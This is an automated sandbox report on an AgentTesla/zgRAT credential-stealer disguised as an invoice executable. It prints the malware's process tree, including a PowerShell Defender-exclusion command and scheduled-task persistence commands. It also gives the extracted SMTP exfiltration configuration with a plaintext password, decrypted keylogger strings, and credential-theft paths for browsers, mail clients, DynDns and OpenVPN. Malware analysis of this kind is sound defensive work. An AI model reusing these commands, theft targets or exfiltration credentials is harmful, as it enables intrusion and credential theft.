Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
INVOICE_NO._29998172.exe

Overview

General Information

Sample Name:INVOICE_NO._29998172.exe
Analysis ID:876157
MD5:024997939b7ce9b28382176c0a70cec8
SHA1:48ef66cbadfff627b81794aaab7db1a6413cb43b
SHA256:13e98dcbf169f54503a15d9415b086222ae48f2e872c69c9417e56d29f610b85
Tags:exe
Infos:

Detection

AgentTesla, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected zgRAT
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Sigma detected: Scheduled temp file as task from temp location
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Machine Learning detection for sample
.NET source code contains potential unpacker
Machine Learning detection for dropped file
Adds a directory exclusion to Windows Defender
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Classification

  • System is w10x64
  • INVOICE_NO._29998172.exe (PID: 6856 cmdline: C:\Users\user\Desktop\INVOICE_NO._29998172.exe MD5: 024997939B7CE9B28382176C0A70CEC8)
    • powershell.exe (PID: 6944 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\txQleCu.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 7076 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\txQleCu" /XML "C:\Users\user\AppData\Local\Temp\tmpEB82.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • INVOICE_NO._29998172.exe (PID: 6032 cmdline: C:\Users\user\Desktop\INVOICE_NO._29998172.exe MD5: 024997939B7CE9B28382176C0A70CEC8)
  • txQleCu.exe (PID: 6012 cmdline: C:\Users\user\AppData\Roaming\txQleCu.exe MD5: 024997939B7CE9B28382176C0A70CEC8)
    • schtasks.exe (PID: 6372 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\txQleCu" /XML "C:\Users\user\AppData\Local\Temp\tmp3339.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • txQleCu.exe (PID: 6656 cmdline: C:\Users\user\AppData\Roaming\txQleCu.exe MD5: 024997939B7CE9B28382176C0A70CEC8)
  • cleanup
{"Exfil Mode": "SMTP", "Host": "mail.gimpex-imerys.com", "Username": "qclab@gimpex-imerys.com", "Password": "h45ZVRb6(IMF"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.399658088.000000000407C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
    00000005.00000002.440863847.000000000450B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000000.00000002.399658088.0000000004975000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
        00000006.00000002.629144860.0000000002E91000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000006.00000002.629144860.0000000002E91000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 7 entries
            SourceRuleDescriptionAuthorStrings
            5.2.txQleCu.exe.4561c18.7.unpackMSIL_SUSP_OBFUSC_XorStringsNetDetects XorStringsNET string encryption, and other obfuscators derived from itdr4k0nia
            • 0x17d0a:$pattern: 06 1E 58 07 8E 69 FE 17
            • 0x26a72:$a2: _CorExeMain
            • 0x228de:$a3: mscorlib
            • 0x23cce:$a4: .cctor
            • 0x22639:$a6: <Module>
            5.2.txQleCu.exe.4561c18.7.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              12.2.txQleCu.exe.400000.0.unpackMSIL_SUSP_OBFUSC_XorStringsNetDetects XorStringsNET string encryption, and other obfuscators derived from itdr4k0nia
              • 0x19b0a:$pattern: 06 1E 58 07 8E 69 FE 17
              • 0x246de:$a3: mscorlib
              • 0x24439:$a6: <Module>
              5.2.txQleCu.exe.4561c18.7.raw.unpackMSIL_SUSP_OBFUSC_XorStringsNetDetects XorStringsNET string encryption, and other obfuscators derived from itdr4k0nia
              • 0x19b0a:$pattern: 06 1E 58 07 8E 69 FE 17
              • 0x28872:$a2: _CorExeMain
              • 0x246de:$a3: mscorlib
              • 0x25ace:$a4: .cctor
              • 0x24439:$a6: <Module>
              5.2.txQleCu.exe.4561c18.7.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                Click to see the 18 entries

                Persistence and Installation Behavior

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\txQleCu" /XML "C:\Users\user\AppData\Local\Temp\tmpEB82.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\txQleCu" /XML "C:\Users\user\AppData\Local\Temp\tmpEB82.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\INVOICE_NO._29998172.exe, ParentImage: C:\Users\user\Desktop\INVOICE_NO._29998172.exe, ParentProcessId: 6856, ParentProcessName: INVOICE_NO._29998172.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\txQleCu" /XML "C:\Users\user\AppData\Local\Temp\tmpEB82.tmp, ProcessId: 7076, ProcessName: schtasks.exe
                Timestamp:192.168.2.35.100.152.24496975872839723 05/26/23-11:30:19.875830
                SID:2839723
                Source Port:49697
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.35.100.152.24496985872839723 05/26/23-11:30:38.087396
                SID:2839723
                Source Port:49698
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.35.100.152.24496975872030171 05/26/23-11:30:19.875830
                SID:2030171
                Source Port:49697
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.35.100.152.24496985872851779 05/26/23-11:30:38.087497
                SID:2851779
                Source Port:49698
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.35.100.152.24496975872840032 05/26/23-11:30:19.875984
                SID:2840032
                Source Port:49697
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.35.100.152.24496985872840032 05/26/23-11:30:38.087497
                SID:2840032
                Source Port:49698
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.35.100.152.24496975872851779 05/26/23-11:30:19.875984
                SID:2851779
                Source Port:49697
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.35.100.152.24496985872030171 05/26/23-11:30:38.087396
                SID:2030171
                Source Port:49698
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 5.2.txQleCu.exe.4561c18.7.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.gimpex-imerys.com", "Username": "qclab@gimpex-imerys.com", "Password": "h45ZVRb6(IMF"}
                Source: INVOICE_NO._29998172.exeReversingLabs: Detection: 25%
                Source: INVOICE_NO._29998172.exeVirustotal: Detection: 34%Perma Link
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeReversingLabs: Detection: 25%
                Source: INVOICE_NO._29998172.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeJoe Sandbox ML: detected
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: /log.tmp
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: KL
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: KL
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <br>[
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: yyyy-MM-dd HH:mm:ss
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ]<br>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <br>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: PW
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Time:
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <br>User Name:
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <br>Computer Name:
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <br>OSFullName:
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <br>CPU:
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <br>RAM:
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <br>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: IP Address:
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <br>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <hr>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: New
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: /
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: IP Address:
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: _
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: /
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: /
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: false
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: false
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: false
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: false
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: false
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: false
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: false
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 20
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 20
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 1
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: false
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 587
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: false
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: mail.gimpex-imerys.com
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: qclab@gimpex-imerys.com
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: h45ZVRb6(IMF
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: obtxxxtf@gmail.com
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: false
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: false
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: appdata
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: hOTAU
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: hOTAU.exe
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: hOTAU
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Type
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: :
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: :
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <br>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <hr>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <br>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <b>[
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ]</b> (
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: )<br>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {BACK}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {ALT+TAB}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {ALT+F4}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {TAB}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {ESC}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {Win}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {CAPSLOCK}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {KEYUP}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {KEYDOWN}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {KEYLEFT}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {KEYRIGHT}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {DEL}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {END}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {HOME}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {Insert}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {NumLock}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {PageDown}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {PageUp}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {ENTER}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {F1}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {F2}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {F3}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {F4}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {F5}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {F6}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {F7}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {F8}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {F9}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {F10}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {F11}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {F12}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor:
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: control
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {CTRL}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: &
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: &amp;
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: &lt;
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: >
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: &gt;
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: "
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: &quot;
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <br><hr>Copied Text: <br>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <hr>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: logins
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: IE/Edge
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Windows Secure Note
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Windows Web Password Credential
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Windows Credential Picker Protector
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Web Credentials
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Windows Credentials
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Windows Domain Certificate Credential
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Windows Domain Password Credential
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Windows Extended Credential
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 00000000-0000-0000-0000-000000000000
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SchemaId
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: pResourceElement
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: pIdentityElement
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: pPackageSid
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: pAuthenticatorElement
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: IE/Edge
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: UC Browser
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: UCBrowser\
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: *
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Login Data
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: journal
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: wow_logins
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Safari for Windows
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Apple Computer\Preferences\keychain.plist
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <array>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <dict>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <string>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: </string>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <string>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: </string>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <data>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: </data>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: -convert xml1 -s -o "
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \fixed_keychain.xml"
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: "
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: "
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Microsoft\Credentials\
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Microsoft\Credentials\
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Microsoft\Credentials\
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Microsoft\Credentials\
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Microsoft\Protect\
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: credential
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: QQ Browser
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Tencent\QQBrowser\User Data
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Default\EncryptedStorage
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Profile
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \EncryptedStorage
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: entries
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: category
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Password
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: str3
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: str2
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: blob0
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: password_value
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: IncrediMail
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: PopPassword
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SmtpPassword
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Software\IncrediMail\Identities\
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Accounts_New
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: PopPassword
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SmtpPassword
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SmtpServer
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: EmailAddress
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Eudora
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Software\Qualcomm\Eudora\CommandLine\
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: current
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Settings
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SavePasswordText
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Settings
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ReturnAddress
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: -
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Falkon Browser
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \falkon\profiles\
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: profiles.ini
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: startProfile=([A-z0-9\/\.\"]+)
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: profiles.ini
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \browsedata.db
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: autofill
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ClawsMail
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Claws-mail
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \clawsrc
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \clawsrc
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: passkey0
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: master_passphrase_salt=(.+)
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: master_passphrase_pbkdf2_rounds=(.+)
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \accountrc
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: smtp_server
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: address
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: account
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: [
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor:
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ]
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \passwordstorerc
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {(.*),(.*)}(.*)
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Flock Browser
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: APPDATA
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Flock\Browser\
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: signons3.txt
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ---
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: .
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ---
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: DynDns
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ALLUSERSPROFILE
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Dyn\Updater\config.dyndns
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: username=
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: password=
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: https://account.dyn.com/
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: t6KzXhCh
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ALLUSERSPROFILE
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Dyn\Updater\daemon.cfg
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: global
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: accounts
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: account.
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: username
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: account.
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: password
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Psi/Psi+
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: name
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: jid
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: password
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: jid
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Psi/Psi+
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: APPDATA
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Psi\profiles
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: APPDATA
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Psi+\profiles
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \accounts.xml
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \accounts.xml
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: OpenVPN
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Software\OpenVPN-GUI\configs
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Software\OpenVPN-GUI\configs
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Software\OpenVPN-GUI\configs\
